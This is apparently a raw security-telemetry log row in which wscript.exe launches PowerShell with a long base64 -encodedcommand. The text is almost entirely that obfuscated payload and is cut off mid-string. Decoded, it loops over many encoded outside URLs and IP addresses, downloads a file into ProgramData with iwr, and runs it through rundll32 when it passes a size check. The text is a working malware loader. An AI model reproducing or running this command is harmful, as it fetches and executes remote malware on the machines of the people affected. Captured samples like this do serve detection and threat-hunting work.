AdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQg